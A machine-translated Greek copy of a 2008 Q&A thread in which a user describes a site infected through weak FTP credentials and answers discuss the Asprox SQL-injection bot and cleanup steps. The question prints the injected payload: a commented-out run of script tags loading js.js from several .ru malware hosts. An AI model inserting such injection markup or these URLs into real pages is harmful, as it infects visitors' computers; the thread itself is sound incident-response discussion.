Η ιστοσελίδα μου πήρε hacked .. Τι πρέπει να κάνω;

ψήφοι
18

Ο μπαμπάς μου μου τηλεφώνησε σήμερα και ότι οι άνθρωποι πηγαίνουν στην ιστοσελίδα του είχαν πάρει 168 ιούς που προσπαθούν να κατεβάσετε στον υπολογιστή τους. Δεν είναι τεχνικά καθόλου, και χτίστηκε το όλο θέμα με ένα πρόγραμμα επεξεργασίας WYSIWYG.

Έσκασα ιστοσελίδα του ανοιχτά και να δει την πηγή, και υπήρχε μια γραμμή Javascript περιλαμβάνει στο κάτω μέρος της πηγής ακριβώς πριν από την ετικέτα κλεισίματος HTML. Έχουν συμπεριληφθεί αυτό το αρχείο (μεταξύ πολλών άλλων): http://www.98hs.ru/js.js <- σβήνετε τη JavaScript πριν πάτε για αυτή τη διεύθυνση URL.

Γι 'αυτό και σχολίασε για τώρα. Βγάζει τον κωδικό πρόσβασης FTP του ήταν μια απλή λέξη λεξικό μακρύ έξι γράμματα, γι 'αυτό νομίζω ότι είναι το πώς πήρε hacked. Έχουμε αλλάξει τον κωδικό πρόσβασής του σε 8+ ψηφίων κλωστή μη-λέξη (δεν θα πάει για μια συνθηματική φράση δεδομένου ότι είναι μια Typer κυνήγι-n-ραμφίζουν).

Έκανα μια whois για 98hs.ru και διαπίστωσε ότι φιλοξενείται από έναν εξυπηρετητή στη Χιλή. Υπάρχει στην πραγματικότητα μια διεύθυνση ηλεκτρονικού ταχυδρομείου που συνδέεται με αυτό πάρα πολύ, αλλά έχω σοβαρές αμφιβολίες για το πρόσωπο αυτό είναι ο ένοχος. Πιθανώς ακριβώς κάποιο άλλο site που πήρε hacked ...

Δεν έχω καμία ιδέα για το τι πρέπει να κάνουμε σε αυτό το σημείο αν και ποτέ δεν έχω ασχοληθεί με αυτό το είδος του πράγματος πριν. Όποιος έχει κάποια πρόταση;

Ήταν χρησιμοποιώντας Plain Jane μη εξασφαλισμένα ftp μέσω webhost4life.com. Δεν βλέπω ακόμη έναν τρόπο για να κάνετε sftp στην περιοχή τους. Σκέφτομαι το όνομα χρήστη και τον κωδικό πρόσβασης του πήρε υποκλαπεί;

Έτσι, για να κάνουν αυτό το πιο σημαντικό για την κοινότητα, ποια είναι τα βήματα που πρέπει να πάρετε / βέλτιστες πρακτικές θα πρέπει να ακολουθήσετε για να προστατεύσει την ιστοσελίδα σας από το να hacked;

Για την ιστορία, εδώ είναι η γραμμή κώδικα που «μαγικά» πήρε προστεθεί στο αρχείο του (και δεν είναι στο φάκελό του στον υπολογιστή του - έχω μείνει σχολίασε έξω μόνο για να την απόλυτη βεβαιωθείτε ότι δεν θα κάνει τίποτα σε αυτή τη σελίδα, αν και είμαι βέβαιος ότι ο Jeff θα προφυλαχθεί από αυτό):

<!--script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.98hs.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.porv.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script><script src=http://www.uhwc.ru/js.js></script-->
Δημοσιεύθηκε 06/08/2008 στις 00:55
πηγή χρήστη
Σε άλλες γλώσσες...                            


8 απαντήσεις

ψήφοι
14

Ξέρω ότι αυτό είναι λίγο αργά στο παιχνίδι, αλλά η διεύθυνση URL που αναφέρεται για την Javascript για αναφέρεται σε έναν κατάλογο των τόπων που είναι γνωστό ότι αποτελούν μέρος του bot αναβίωση ASPRox που ξεκίνησε τον Ιούνιο (τουλάχιστον αυτό είναι όταν ήμασταν πάρει επισημανθεί με το). Ορισμένες λεπτομέρειες γι 'αυτό αναφέρονται παρακάτω:

http://www.bloombit.com/Articles/2008/05/ASCII-Encoded-Binary-String-Automated-SQL-Injection.aspx

Το δυσάρεστο πράγμα για αυτό είναι ότι ουσιαστικά κάθε πεδίο τύπου varchar στη βάση δεδομένων «μολυνθεί» για να φτύσει μια αναφορά σε αυτό το URL, στην οποία το πρόγραμμα περιήγησης παίρνει ένα μικρό iframe που το μετατρέπει σε ένα bot. Μια βασική SQL ενημέρωση κώδικα για αυτό μπορείτε να βρείτε εδώ:

http://aspadvice.com/blogs/programming_shorts/archive/2008/06/27/Asprox-Recovery.aspx

Το τρομακτικό όμως είναι ότι ο ιός φαίνεται στους πίνακες σύστημα αξιών να μολύνει και πολλά κοινά σχέδια που φιλοξενεί μοιράζονται επίσης το χώρο της βάσης δεδομένων για τους πελάτες τους. Έτσι, το πιθανότερο ήταν το site δεν είναι καν ο μπαμπάς σας που έχει μολυνθεί, αλλά το site κάποιου άλλου μέσα που φιλοξενεί σύμπλεγμα του που έγραψε κάποιο φτωχό κώδικα και άνοιξε την πόρτα σε SQL Injection επιθέσεις.

Αν δεν το έχει πράξει ακόμα, θα ήθελα να στείλετε ένα επείγον e-mail στο υποδοχής τους και να τους δώσει μια σύνδεση με αυτόν τον κώδικα SQL για να καθορίσει το σύνολο του συστήματος. Μπορείτε να διορθώσετε τις δικές σας επηρεάζεται πίνακες της βάσης δεδομένων, αλλά κατά πάσα πιθανότητα τα bots που κάνουν τη μόλυνση πρόκειται να περάσει δεξιά μέσα από αυτή την τρύπα και πάλι και να μολύνουν το σύνολο της παρτίδας.

Ας ελπίσουμε ότι αυτό σας δίνει κάποιες περισσότερες πληροφορίες για να εργαστεί με.

EDIT: Μια πιο γρήγορη σκέψη, αν έχει, χρησιμοποιώντας έναν από τους οικοδεσπότες σε απευθείας σύνδεση εργαλεία σχεδιασμού για την κατασκευή ιστοσελίδας του, το σύνολο του περιεχομένου είναι πιθανόν να κάθεται σε μια στήλη και είχε μολυνθεί με αυτόν τον τρόπο.

Απαντήθηκε 07/08/2008 στις 23:49
πηγή χρήστη

ψήφοι
13

Δοκιμάστε και να συγκεντρώσει όσες περισσότερες πληροφορίες μπορείτε. Δείτε αν ο οικοδεσπότης μπορεί να σας δώσει ένα ημερολόγιο που δείχνει όλες τις συνδέσεις FTP που έγιναν στο λογαριασμό σας. Μπορείτε να τα χρησιμοποιήσετε για να δούμε αν ήταν ακόμα μια σύνδεση FTP που χρησιμοποιούνται για να κάνουν την αλλαγή και ενδεχομένως να πάρει μια διεύθυνση IP.

Εάν χρησιμοποιείτε ένα προσυσκευασμένο λογισμικό όπως το Wordpress, Drupal, ή οτιδήποτε άλλο που δεν κώδικα μπορεί να υπάρχουν τρωτά σημεία στον κώδικα αποστολή που επιτρέπει αυτό το είδος της τροποποίησης. Αν είναι προσαρμοσμένη χτισμένο διπλά ελέγξετε τυχόν μέρη όπου θα επιτρέπουν στους χρήστες να ανεβάζουν αρχεία ή να τροποποιήσετε υπάρχοντα αρχεία.

Το δεύτερο πράγμα που θα ήταν να ρίξετε μια χωματερή της περιοχής ως έχει και να ελέγχει τα πάντα για άλλες τροποποιήσεις. Μπορεί απλά να είναι μία μοναδική τροποποίηση που γίνεται, αλλά αν έχεις το μέσω FTP ποιος ξέρει τι άλλο είναι εκεί.

Επαναφορά site σας πίσω σε μια γνωστή καλή κατάσταση και, αν χρειαστεί, αναβάθμιση στην πιο πρόσφατη έκδοση.

Υπάρχει ένα επίπεδο απόδοσης θα πρέπει να ληφθούν υπόψη πάρα πολύ. Είναι η ζημία που αξίζει να προσπαθεί να εντοπίσει το πρόσωπο προς τα κάτω ή είναι αυτό το κάτι, όπου μπορείτε απλά να ζήσουν και να μάθουν και να χρησιμοποιούν ισχυρότερη κωδικούς πρόσβασης;

Απαντήθηκε 06/08/2008 στις 01:16
πηγή χρήστη

ψήφοι
5

Θα αναφέρω τον μπαμπά σας χρησιμοποιούσε ένα εργαλείο ιστοσελίδα των εκδόσεων.

Αν το εργαλείο δημοσίευσης δημοσιεύει από τον υπολογιστή του στο διακομιστή, μπορεί να είναι η περίπτωση που τα τοπικά αρχεία του είναι καθαρά, και ότι θα πρέπει απλά να αναδημοσιεύσετε στο διακομιστή.

Θα πρέπει να δούμε αν υπάρχει μια διαφορετική μέθοδο σύνδεσης με το διακομιστή του από απλό FTP, αν ... αυτό δεν είναι πολύ ασφαλές, επειδή στέλνει τον κωδικό του ως απλού κειμένου μέσω του διαδικτύου.

Απαντήθηκε 06/08/2008 στις 04:31
πηγή χρήστη

ψήφοι
3

Με τον κωδικό χαρακτήρα έξι λέξη, που μπορεί να έχουν ωμή αναγκαστική. Αυτό είναι πιο πιθανό από ό, τι ftp του να υποκλαπούν, αλλά θα μπορούσε να είναι ότι πάρα πολύ.

Ξεκινήστε με ένα ισχυρότερο κωδικό πρόσβασης. (8 χαρακτήρες εξακολουθεί να είναι αρκετά αδύναμη)

Δείτε εάν αυτό το σύνδεσμο σε ένα internet blog της ασφάλειας είναι χρήσιμη.

Απαντήθηκε 06/08/2008 στις 01:00
πηγή χρήστη

ψήφοι
2

Είναι η ιστοσελίδα απλά στατικές HTML; δηλαδή δεν έχει καταφέρει να κωδικοποιήσει ο ίδιος μια σελίδα μεταφόρτωσης που επιτρέπει σε οποιονδήποτε οδήγηση να ανεβάσετε μειωμένη scripts / σελίδες;

Γιατί να μην ρωτήσω webhost4life αν έχουν διαθέσιμα όλα τα αρχεία καταγραφής FTP και να αναφέρετε το πρόβλημα τους. Ποτέ δεν ξέρεις, μπορεί να είναι αρκετά δεκτικοί και να μάθετε για σας τι ακριβώς συνέβη;

Δουλεύω για μια κοινή hoster και χαιρετίζουμε πάντα εκθέσεις, όπως αυτές και μπορούν συνήθως να εντοπίσει την ακριβή φορέας της επίθεσης που βασίζεται και παρέχει συμβουλές για το πού ο πελάτης πήγε στραβά.

Απαντήθηκε 06/08/2008 στις 01:24
πηγή χρήστη

ψήφοι
0

Αυτό συνέβη σε έναν πελάτη μου που πρόσφατα φιλοξενήθηκε σε iPower. Δεν είμαι σίγουρος αν φιλοξενία σας περιβάλλον βασίστηκε Apache, αλλά αν ήταν να είστε βέβαιος στο διπλό έλεγχο για .htaccess αρχεία που δεν έχετε δημιουργήσει, ιδιαίτερα πάνω από το Webroot και στο εσωτερικό των καταλόγων εικόνα, δεδομένου ότι τείνουν να εισφέρει κάποια κακοήθεια εκεί καθώς επίσης (είχαν τον αναπροσανατολισμό των ανθρώπων ανάλογα με το από πού ήρθαν στη αναφέρονται). Επίσης, ελέγξτε κάθε που είχε δημιουργήσει για τον κώδικα που δεν έγραψε.

Απαντήθηκε 26/09/2008 στις 21:21
πηγή χρήστη

ψήφοι
0

Αποσυνδέστε το διακομιστή, χωρίς να κλείνει προς τα κάτω για να αποφύγετε τα σενάρια τερματισμού. Αναλύστε το σκληρό δίσκο με έναν άλλο υπολογιστή ως μονάδα δίσκου δεδομένων και να δείτε αν μπορείτε να προσδιορίσετε τον ένοχο μέσα από τα αρχεία καταγραφής και τα πράγματα αυτού του είδους. Βεβαιωθείτε ότι ο κώδικας είναι ασφαλής και, στη συνέχεια, επαναφέρετε από ένα αντίγραφο ασφαλείας.

Απαντήθηκε 26/09/2008 στις 21:12
πηγή χρήστη

ψήφοι
-1

Είχαμε ήδη χαραχτεί από την ίδια παιδιά προφανώς! Ή bots, στην περίπτωσή μας. Χρησιμοποίησαν ένεση SQL στη διεύθυνση URL σε μερικά παλιά κλασικά sites ASP που κανείς δεν διατηρούν πια. Βρήκαμε επίθεση IPs και να μπλοκάρει το IIS. Τώρα πρέπει να refactor όλα τα παλιά ASP. Έτσι, η συμβουλή μου είναι να ρίξετε μια ματιά στο IIS καταγράφει την πρώτη, για να διαπιστωθεί εάν το πρόβλημα είναι στον κώδικα ή διακομιστή διαμόρφωσης του δικτυακού σας τόπου.

Απαντήθηκε 16/08/2008 στις 17:35
πηγή χρήστη

Cookies help us deliver our services. By using our services, you agree to our use of cookies. Learn more